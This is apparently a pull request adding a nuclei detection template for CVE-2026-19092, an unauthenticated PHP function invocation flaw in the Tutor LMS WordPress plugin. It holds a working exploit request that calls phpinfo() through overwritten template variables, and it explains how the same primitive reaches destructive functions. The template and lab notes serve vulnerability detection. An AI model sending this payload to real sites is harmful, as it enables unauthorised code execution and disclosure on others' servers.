### PR TITLE
Add CVE-2026-19092 - Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation

### DIFF
--- a/http/cves/2026/CVE-2026-19092.yaml
+++ b/http/cves/2026/CVE-2026-19092.yaml
@@ -1,0 +1,82 @@
+id: CVE-2026-19092
+
+info:
+  name: Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation
+  author: aryu-ru
+  severity: critical
+  description: |
+    Tutor LMS plugin for WordPress before 4.0.6 renders templates with request data extracted into the local scope, allowing unauthenticated attackers to invoke arbitrary zero-argument PHP functions and read their output. The tutor_course_filter_ajax AJAX action is registered for unauthenticated users and passes the sanitized POST body straight to tutor_load_template(), whose extract() call overwrites the $template local and lets an attacker choose which template file is included. Loading the single-content-loader template then extracts the attacker supplied data array over its own $method_map and $context variables, so the is_callable($method_map[$context])() dispatch executes any named function.
+  impact: |
+    A remote, unauthenticated attacker can execute arbitrary zero-argument PHP functions on the server and read their output. Beyond disclosing the full PHP configuration, environment variables and filesystem paths through functions such as phpinfo(), the same primitive reaches destructive WordPress internals, allowing session destruction, deletion of site options and dropping of database tables.
+  remediation: |
+    Update Tutor LMS to version 4.0.6 or later, which extracts template variables with EXTR_SKIP and replaces the dynamic callable dispatch with a static switch.
+  reference:
+    - https://wpscan.com/vulnerability/da7fb4c7-6d07-4c96-bde2-95bca1797d56/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-19092
+    - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/includes/tutor-template-functions.php
+    - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/templates/single-content-loader.php
+    - https://wordpress.org/plugins/tutor/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-19092
+    cwe-id: CWE-74
+    epss-score: 0.00352
+    epss-percentile: 0.27960
+    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: themeum
+    product: tutor_lms
+    framework: wordpress
+    shodan-query: html:"/wp-content/plugins/tutor/"
+    fofa-query: body="/wp-content/plugins/tutor/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,tutor-lms,themeum,rce,unauth
+
+variables:
+  ctx: "{{rand_base(8, 'abcdefghijklmnopqrstuvwxyz')}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    extractors:
+      - type: regex
+        part: body
+        name: nonce
+        group: 1
+        internal: true
+        regex:
+          - '"_tutor_nonce":"([a-z0-9]+)"'
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=tutor_course_filter_ajax&_tutor_nonce={{nonce}}&template=single-content-loader&data[context]={{ctx}}&data[method_map][{{ctx}}]=phpinfo
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - "PHP Extension Build"
+          - "Configuration File (php.ini) Path"
+          - "allow_url_fopen"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'PHP Version ([0-9]+\.[0-9]+\.[0-9]+)'

--- a/http/cves/2026/CVE-2026-19092.yaml
+++ b/http/cves/2026/CVE-2026-19092.yaml
@@ -5,25 +5,19 @@ info:
   author: aryu-ru
   severity: critical
   description: |
-    Tutor LMS plugin for WordPress before 4.0.6 renders templates with request data extracted into the local scope, allowing unauthenticated attackers to invoke arbitrary zero-argument PHP functions and read their output. The tutor_course_filter_ajax AJAX action is registered for unauthenticated users and passes the sanitized POST body straight to tutor_load_template(), whose extract() call overwrites the $template local and lets an attacker choose which template file is included. Loading the single-content-loader template then extracts the attacker supplied data array over its own $method_map and $context variables, so the is_callable($method_map[$context])() dispatch executes any named function.
+    Tutor LMS WordPress plugin < 4.0.6 contains a template injection caused by insufficient prevention of request data overwriting internal variables during template rendering, letting unauthenticated attackers invoke arbitrary zero-argument PHP functions and receive their output.
   impact: |
-    A remote, unauthenticated attacker can execute arbitrary zero-argument PHP functions on the server and read their output. Beyond disclosing the full PHP configuration, environment variables and filesystem paths through functions such as phpinfo(), the same primitive reaches destructive WordPress internals, allowing session destruction, deletion of site options and dropping of database tables.
+    Unauthenticated attackers can execute arbitrary PHP functions and obtain their output, potentially leading to information disclosure or further exploitation.
   remediation: |
-    Update Tutor LMS to version 4.0.6 or later, which extracts template variables with EXTR_SKIP and replaces the dynamic callable dispatch with a static switch.
+    Update to version 4.0.6 or later.
   reference:
     - https://wpscan.com/vulnerability/da7fb4c7-6d07-4c96-bde2-95bca1797d56/
     - https://nvd.nist.gov/vuln/detail/CVE-2026-19092
-    - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/includes/tutor-template-functions.php
-    - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/templates/single-content-loader.php
-    - https://wordpress.org/plugins/tutor/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2026-19092
     cwe-id: CWE-74
-    epss-score: 0.00352
-    epss-percentile: 0.27960
-    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
     max-request: 2
@@ -32,15 +26,26 @@ info:
     framework: wordpress
     shodan-query: html:"/wp-content/plugins/tutor/"
     fofa-query: body="/wp-content/plugins/tutor/"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,tutor-lms,themeum,rce,unauth
+  tags: cve,cve2026,wordpress,wp,wp-plugin,tutor-lms,rce,unauth
 
 variables:
   ctx: "{{rand_base(8, 'abcdefghijklmnopqrstuvwxyz')}}"
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "_tutor_nonce")'
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
@@ -59,20 +64,12 @@ http:
 
         action=tutor_course_filter_ajax&_tutor_nonce={{nonce}}&template=single-content-loader&data[context]={{ctx}}&data[method_map][{{ctx}}]=phpinfo
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"success":true'
-          - "PHP Extension Build"
-          - "Configuration File (php.ini) Path"
-          - "allow_url_fopen"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "\"success\":true", "PHP Extension Build", "Configuration File (php.ini) Path", "allow_url_fopen")'
         condition: and
-
-      - type: status
-        status:
-          - 200
 
     extractors:
       - type: regex


### PR DESCRIPTION
### PR Information

- Added CVE-2026-19092: Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation

Tutor LMS (100,000+ active installs) renders templates with request data extracted into the local scope. The `tutor_course_filter_ajax` AJAX action is registered via `wp_ajax_nopriv_`, and `Course_Filter::load_listing()` passes the sanitized `$_POST` body straight into `tutor_load_template()`. That function calls `extract( $variables )` *before* `$template` is used, so a POST parameter named `template` overwrites the `$template` local and selects which template file gets included.

Pointing it at `single-content-loader` reaches a second `extract( $data )` that overwrites the template's own `$method_map` and `$context` variables, so the `is_callable( $method_map[ $context ] ) ? $method_map[ $context ]() : 0` dispatch invokes any named zero-argument function. The template proves this by calling `phpinfo()` and matching its output, so detection is exploitation proof rather than a version check.

Fixed in 4.0.6, which switches both loaders to `extract( $variables, EXTR_SKIP )` and replaces the dynamic callable dispatch with a static `switch`.

- References:
  - https://wpscan.com/vulnerability/da7fb4c7-6d07-4c96-bde2-95bca1797d56/
  - https://nvd.nist.gov/vuln/detail/CVE-2026-19092
  - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/includes/tutor-template-functions.php
  - https://plugins.svn.wordpress.org/tutor/tags/4.0.6/templates/single-content-loader.php

Vulnerability discovered by Jakub Herman (credited in the WPScan advisory). Happy to add their handle to the `author` field if you know it. I could not find one to attribute accurately.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Classification:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8, critical), CWE-74, per NVD and the WPScan CNA entry.

**Lab setup** (fully reproducible, no paid software):

```
# wordpress:6.8-apache + mariadb:11 on :8099, then:
wp core install --url=http://127.0.0.1:8099 --title=Lab --admin_user=admin \
  --admin_password='<redacted>' --admin_email=a@b.co --skip-email
wp plugin install https://downloads.wordpress.org/plugin/tutor.4.0.5.zip --activate
```

No plugin configuration, no courses created. The flaw is reachable on a default install.

**True positive (Tutor LMS 4.0.5):**

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8099
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

action=tutor_course_filter_ajax&_tutor_nonce=4284d945cb&template=single-content-loader&data[context]=kmycbdti&data[method_map][kmycbdti]=phpinfo
```

```
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.4.65 (Debian)
X-Powered-By: PHP/8.3.28

{"success":true,"data":{"html":"\t\t\t<!doctype html>\n\t\t\t\t<html lang=\"en-US\">\n ...
... PHP Version 8.3.28 ...
... PHP Extension Build <\/td><td class=\"v\">API20230831,NTS ...
```

Response is 171,047 bytes of rendered `phpinfo()` output. The `_tutor_nonce` consumed in step 1 is published to anonymous visitors in the `_tutorobject` localized script on `/`, so no authentication is involved.

```
[CVE-2026-19092:word-1] [http] [critical] http://127.0.0.1:8099/wp-admin/admin-ajax.php ["8.3.28"]
[CVE-2026-19092:status-2] [http] [critical] http://127.0.0.1:8099/wp-admin/admin-ajax.php ["8.3.28"]
```

**Negative tests (no match in any of these):**

| Target | Result |
| -- | -- |
| Tutor LMS 4.0.6 (patched) | no match |
| Tutor LMS 4.0.7 (latest) | no match |
| WordPress with Tutor LMS deactivated | no match |
| `http://honey.scanme.sh` (weak-matcher CI gate) | no match |

Worth noting for review: patched 4.0.6 still answers this request with `{"success":true,...}` (427 bytes), so `"success":true` is deliberately not load-bearing on its own. The four words are ANDed and the `phpinfo()` strings are what actually discriminate. None of those strings appear anywhere in the request, so a reflecting/echo host cannot trigger the matcher. Confirmed against the honeypot.

**Other checks:**

- `nuclei -validate`: passes
- `yamllint -c .yamllint`: clean
- The randomized `{{ctx}}` key proves the `$method_map` lookup is genuinely attacker-controlled rather than hitting a pre-existing key.
- Detection is non-destructive: `phpinfo()` only reads configuration. The same primitive can reach destructive functions, but the template deliberately does not use them.

**Novelty:** no existing template covers this. `grep` for the CVE ID, `themeum`, the plugin slug and the PoC-specific strings (`tutor_course_filter_ajax`, `single-content-loader`, `_tutorobject`, `method_map`) returns nothing. The existing Tutor LMS templates (CVE-2024-10400, CVE-2024-1751) target the `load_filtered_instructor` action and a SQL sink, and `wp-tutor-lfi.yaml` is a 1.5.3-era direct file include, so none of them fire on this issue.
